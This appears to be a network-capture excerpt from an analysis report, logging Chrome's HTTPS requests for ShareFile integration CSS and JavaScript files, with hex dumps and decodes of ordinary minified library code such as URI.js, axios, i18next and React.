                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15108INData Raw: 72 6e 6f 76 74 73 79 20 63 6b 20 63 6e 20 63 6f 20 63 6f 6d 20 63 72 69 6d 65 61 20 63 76 20 64 6e 20 64 6e 65 70 72 6f 70 65 74 72 6f 76 73 6b 20 64 6f 6e 65 74 73 6b 20 64 70 20 65 64 75 20 67 6f 76 20 69 66 20 69 6e 20 69 76 61 6e 6f 2d 66 72 61 6e 6b 69 76 73 6b 20 6b 68 20 6b 68 61 72 6b 6f 76 20 6b 68 65 72 73 6f 6e 20 6b 68 6d 65 6c 6e 69 74 73 6b 69 79 20 6b 69 65 76 20 6b 69 72 6f 76 6f 67 72 61 64 20 6b 6d 20 6b 72 20 6b 73 20 6b 76 20 6c 67 20 6c 75 67 61 6e 73 6b 20 6c 75 74 73 6b 20 6c 76 69 76 20 6d 65 20 6d 6b 20 6e 65 74 20 6e 69 6b 6f 6c 61 65 76 20 6f 64 20 6f 64 65 73 73 61 20 6f 72 67 20 70 6c 20 70 6f 6c 74 61 76 61 20 70 70 20 72 6f 76 6e 6f 20 72 76 20 73 65 62 61 73 74 6f 70 6f 6c 20 73 75 6d 79 20 74 65 20 74 65 72 6e 6f 70 69 6c
                                                                                                                                                                                                                      Data Ascii: rnovtsy ck cn co com crimea cv dn dnepropetrovsk donetsk dp edu gov if in ivano-frankivsk kh kharkov kherson khmelnitskiy kiev kirovograd km kr ks kv lg lugansk lutsk lviv me mk net nikolaev od odessa org pl poltava pp rovno rv sebastopol sumy te ternopil
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC145INData Raw: 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 48 6f 73 74 6e 61 6d 65 20 22 27 2b 74 2b 27 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 3a 5f 5d 20 61 6e 64 20 50 75 6e 79 63 6f 64 65 2e 6a 73 20 69 73
                                                                                                                                                                                                                      Data Ascii: .match(i.invalid_hostname_characters)){if(!e)throw new TypeError('Hostname "'+t+'" contains characters other than [A-Z0-9.-:_] and Punycode.js is
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 27 29 3b 69 66 28 65 2e 74 6f 41 53 43 49 49 28 74 29 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 48 6f 73 74 6e 61 6d 65 20 22 27 2b 74 2b 27 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 3a 5f 5d 27 29 7d 7d 2c 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 50 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 74 3d 4e 75 6d 62 65 72 28 65 29 3b 69 66 28 21 28 2f 5e 5b 30 2d 39 5d 2b 24 2f 2e 74 65 73 74 28 74 29 26 26 74 3e 30 26 26 74 3c 36 35 35 33 36 29 29 74 68 72 6f 77 20 6e 65
                                                                                                                                                                                                                      Data Ascii: not available');if(e.toASCII(t).match(i.invalid_hostname_characters))throw new TypeError('Hostname "'+t+'" contains characters other than [A-Z0-9.-:_]')}},i.ensureValidPort=function(e){if(e){var t=Number(e);if(!(/^[0-9]+$/.test(t)&&t>0&&t<65536))throw ne
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2e 62 75 69 6c 64 28 29 7d 2c 61 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 6f 2c 61 2c 63 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2c 75 3d 6e 65 77 20 69 28 65 29 2c 66 3d 7b 7d 3b 69 66 28 63 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 75 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 3d 63 2e 71 75 65 72 79 28 29 2c 6f 3d 75 2e 71 75 65 72 79 28 29 2c 63 2e 71 75 65 72 79 28 22 22 29 2c 75 2e 71 75 65 72 79 28 22 22 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 21 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 21 3d 3d 6f 2e 6c 65 6e 67 74 68 29
                                                                                                                                                                                                                      Data Ascii: .build()},a.equals=function(e){var t,r,n,o,a,c=this.clone(),u=new i(e),f={};if(c.normalize(),u.normalize(),c.toString()===u.toString())return!0;if(n=c.query(),o=u.query(),c.query(""),u.query(""),c.toString()!==u.toString())return!1;if(n.length!==o.length)
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 72 29 7d 29 29 3b 76 61 72 20 6e 3d 7b 7d 3b 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 74 79 6c 65 5b 22 2e 63 6f 6e 63 61 74 28 5a 2c 22 5d 22 29 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 2c 6f 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5a 29 3b 6e 5b 6f 5d 3f 74 5b 4a 5d 3d 3d 3d 65 26 26 28 6e 75 6c 6c 3d 3d 3d 28 72 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 29 3a 6e 5b 6f 5d 3d 21 30 7d 29 29 7d 72 65 74 75 72 6e 20 6e 65 77 20 58 28 65 29 7d 76 61 72 20 4b 3d 6f 2e 63 72 65 61 74 65 43 6f 6e
                                                                                                                                                                                                                      Data Ascii: .insertBefore(t,r)}));var n={};Array.from(document.querySelectorAll("style[".concat(Z,"]"))).forEach((function(t){var r,o=t.getAttribute(Z);n[o]?t[J]===e&&(null===(r=t.parentNode)||void 0===r||r.removeChild(t)):n[o]=!0}))}return new X(e)}var K=o.createCon
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC15108INData Raw: 72 69 62 75 74 65 28 47 2c 4f 29 2c 75 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7a 28 45 74 28 6f 5b 65 5d 29 2c 22 5f 65 66 66 65 63 74 2d 22 2e 63 6f 6e 63 61 74 28 65 29 2c 69 29 7d 29 29 7d 7d 29 29 2c 52 3d 6d 28 45 2c 33 29 2c 54 3d 52 5b 30 5d 2c 4d 3d 52 5b 31 5d 2c 49 3d 52 5b 32 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 74 3d 78 26 26 21 6a 26 26 70 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 2c 50 65 28 7b 7d 2c 64 28 64 28 7b 7d 2c 47 2c 4d 29 2c 5a 2c 49 29 2c 7b 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 3a 7b 5f 5f 68 74 6d 6c 3a 54 7d 7d 29 29 3a 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 50 74 2c
                                                                                                                                                                                                                      Data Ascii: ribute(G,O),u.forEach((function(e){z(Et(o[e]),"_effect-".concat(e),i)}))}})),R=m(E,3),T=R[0],M=R[1],I=R[2];return function(e){var t;return t=x&&!j&&p?o.createElement("style",Pe({},d(d({},G,M),Z,I),{dangerouslySetInnerHTML:{__html:T}})):o.createElement(Pt,
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC1276INData Raw: 64 28 33 36 30 2a 65 2e 68 29 2c 72 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 65 2e 73 29 2c 6e 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 30 30 2a 65 2e 76 29 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 74 68 69 73 2e 61 3f 22 68 73 76 28 22 2e 63 6f 6e 63 61 74 28 74 2c 22 2c 20 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 25 2c 20 22 29 2e 63 6f 6e 63 61 74 28 6e 2c 22 25 29 22 29 3a 22 68 73 76 61 28 22 2e 63 6f 6e 63 61 74 28 74 2c 22 2c 20 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 25 2c 20 22 29 2e 63 6f 6e 63 61 74 28 6e 2c 22 25 2c 20 22 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 72 6f 75 6e 64 41 2c 22 29 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 48 73 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 4a 74 28 74 68 69 73 2e 72 2c 74 68 69 73
                                                                                                                                                                                                                      Data Ascii: d(360*e.h),r=Math.round(100*e.s),n=Math.round(100*e.v);return 1===this.a?"hsv(".concat(t,", ").concat(r,"%, ").concat(n,"%)"):"hsva(".concat(t,", ").concat(r,"%, ").concat(n,"%, ").concat(this.roundA,")")},e.prototype.toHsl=function(){var e=Jt(this.r,this


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      78192.168.2.174979813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC579OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 07:16:17 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4e4c50c641418e6aad9ec09cb0f22844.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: ZXn3UhV0YHH16Xwv6z93Z6YYTqPjmxKUHVgo94_rtnZqS2VRMZq8_A==
                                                                                                                                                                                                                      Age: 44399
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      79192.168.2.174979913.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC425OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 650980
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:15 GMT
                                                                                                                                                                                                                      ETag: "d46761310b3c627cc468f3b845e55eca"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 9568a708c8ab21597698ebe7dce6c42e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 6gfoVmThaXnPuyI-I_UNMPWVDQcv0ScbgzubGX1m9TvenOyGNyaq4Q==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 6e 74 65 67 72 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 73
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.s
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2c 61 28 74 29 7d 29 29 2c 21 30 29 3a 28 64 2e 61 64 64 51 75 65 72 79 28 7b 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 2e 68 72 65 66 28 29 29 2c 21 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 75 74 68 65 6e 74 69 63 61 74 65 57 69 74 68 54 6f 6b 65 6e 46 72 6f 6d 52 65 64 69 72 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 6f 3d 6e 65 77 20 69 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 29 2e 68 61 73 68 28 29 2e 6d 61 74 63 68 28 2f 5c 3f 63 6f
                                                                                                                                                                                                                      Data Ascii: e.pendingFormsAuthentication,a(t)})),!0):(d.addQuery({redirect_url:window.location.toString()}),window.location.replace(d.href()),!0)},e.prototype.authenticateWithTokenFromRedirect=function(t,n,r){var o=new i(window.location.toString()).hash().match(/\?co
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 46 6f 72 6d 44 61 74 61 3a 6e 28 38 31 30 29 7d 2c 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 3d 32 30 30 26 26 65 3c 33 30 30 7d 2c 68 65 61 64 65 72 73 3a 7b 63 6f 6d 6d 6f 6e 3a 7b 41 63 63 65 70 74 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 20 74 65 78 74 2f 70 6c 61 69 6e 2c 20 2a 2f 2a 22 7d 7d 7d 3b 6f 2e 66 6f 72 45 61 63 68 28 5b 22 64 65 6c 65 74 65 22 2c 22 67 65 74 22 2c 22 68 65 61 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 70 2e 68 65 61 64 65 72 73 5b 65 5d 3d 7b 7d 7d 29 29 2c 6f 2e 66 6f 72 45 61 63 68 28 5b 22 70 6f 73 74 22 2c 22 70 75 74 22 2c 22 70 61 74 63 68 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 70 2e 68 65 61 64 65 72 73 5b 65 5d 3d 6f
                                                                                                                                                                                                                      Data Ascii: FormData:n(810)},validateStatus:function(e){return e>=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};o.forEach(["delete","get","head"],(function(e){p.headers[e]={}})),o.forEach(["post","put","patch"],(function(e){p.headers[e]=o
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15771INData Raw: 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74 29 21 3d 3d 75 6e 64 65 66 69 6e
                                                                                                                                                                                                                      Data Ascii: it("added",e,t,n)}},{key:"removeResourceBundle",value:function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e,t)}},{key:"hasResourceBundle",value:function(e,t){return this.getResource(e,t)!==undefin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 30 3d 3d 65 3f 30 3a 31 3d 3d 65 3f 31 3a 32 3d 3d 65 3f 32 3a 65 25 31 30 30 3e 3d 33 26 26 65 25 31 30 30 3c 3d 31 30 3f 33 3a 65 25 31 30 30 3e 3d 31 31 3f 34 3a 35 29 7d 2c 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 3e 3d 32 26 26 65 3c 3d 34 3f 31 3a 32 29 7d 2c 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 25 31 30 3e 3d 32 26 26 65 25 31 30 3c 3d 34 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 38 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: 00<10||e%100>=20)?1:2)},5:function(e){return Number(0==e?0:1==e?1:2==e?2:e%100>=3&&e%100<=10?3:e%100>=11?4:5)},6:function(e){return Number(1==e?0:e>=2&&e<=4?1:2)},7:function(e){return Number(1==e?0:e%10>=2&&e%10<=4&&(e%100<10||e%100>=20)?1:2)},8:function(
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 7b 72 65 6c 6f 61 64 3a 21 30 7d 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 6c 6f 61 64 4f 6e 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 72 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 6f 3d 72 5b 30 5d 2c 69 3d 72 5b 31 5d 3b 74 68 69 73 2e 72 65 61 64 28 6f 2c 69 2c 22 72 65 61 64 22 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 2c 28 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 72 26 26 74 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 6c 6f 61 64 69 6e 67 20 6e 61 6d 65 73 70 61 63
                                                                                                                                                                                                                      Data Ascii: {reload:!0},n)}},{key:"loadOne",value:function(e){var t=this,n=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"",r=e.split("|"),o=r[0],i=r[1];this.read(o,i,"read",undefined,undefined,(function(r,a){r&&t.logger.warn("".concat(n,"loading namespac
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 6e 2c 22 61 22 2c 6e 29 2c 6e 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 31 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70
                                                                                                                                                                                                                      Data Ascii: numerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e["default"]}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,t,n){Object.defineProp
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC14808INData Raw: 65 6c 6c 43 68 65 63 6b 7c 73 72 63 7c 73 72 63 44 6f 63 7c 73 72 63 4c 61 6e 67 7c 73 72 63 53 65 74 7c 73 74 61 72 74 7c 73 74 65 70 7c 73 74 79 6c 65 7c 73 75 6d 6d 61 72 79 7c 74 61 62 49 6e 64 65 78 7c 74 61 72 67 65 74 7c 74 69 74 6c 65 7c 74 72 61 6e 73 6c 61 74 65 7c 74 79 70 65 7c 75 73 65 4d 61 70 7c 76 61 6c 75 65 7c 77 69 64 74 68 7c 77 6d 6f 64 65 7c 77 72 61 70 7c 61 62 6f 75 74 7c 64 61 74 61 74 79 70 65 7c 69 6e 6c 69 73 74 7c 70 72 65 66 69 78 7c 70 72 6f 70 65 72 74 79 7c 72 65 73 6f 75 72 63 65 7c 74 79 70 65 6f 66 7c 76 6f 63 61 62 7c 61 75 74 6f 43 61 70 69 74 61 6c 69 7a 65 7c 61 75 74 6f 43 6f 72 72 65 63 74 7c 61 75 74 6f 53 61 76 65 7c 63 6f 6c 6f 72 7c 69 6e 63 72 65 6d 65 6e 74 61 6c 7c 66 61 6c 6c 62 61 63 6b 7c 69 6e 65 72 74
                                                                                                                                                                                                                      Data Ascii: ellCheck|src|srcDoc|srcLang|srcSet|start|step|style|summary|tabIndex|target|title|translate|type|useMap|value|width|wmode|wrap|about|datatype|inlist|prefix|property|resource|typeof|vocab|autoCapitalize|autoCorrect|autoSave|color|incremental|fallback|inert
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC1576INData Raw: 65 73 74 72 6f 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 64 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 28 30 2c 6e 5b 74 5d 29 28 65 29 7d 29 2c 66 3b 76 61 72 20 69 2c 61 2c 73 2c 63 2c 75 2c 6c 2c 64 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 28 65 29 3d 3d 3d 65 3f 65 5b 67 5d 3a 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 6e 29 7b 69 66 28 6e 2e 69 73 4d 6f 75 6e 74 65 64 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 2e 73 74 6f 72 65 2c 72 3d 6e 65 77 20 45 28 74 2c 6e 2e 70 61 74 68 2c 74 2e 67 65 74 28 6e 2e 70 61 74 68 29 2c 74 2e 65 64 69 74 69 6f 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 28 7b 73
                                                                                                                                                                                                                      Data Ascii: estroy=function(e){for(var t=0,n=d;t<n.length;t++)(0,n[t])(e)}),f;var i,a,s,c,u,l,d,f}}function h(e,t){var n=Object(e)===e?e[g]:undefined;if(n){if(n.isMounted){var o=function(){var t=n.store,r=new E(t,n.path,t.get(n.path),t.edition,(function(){return s({s
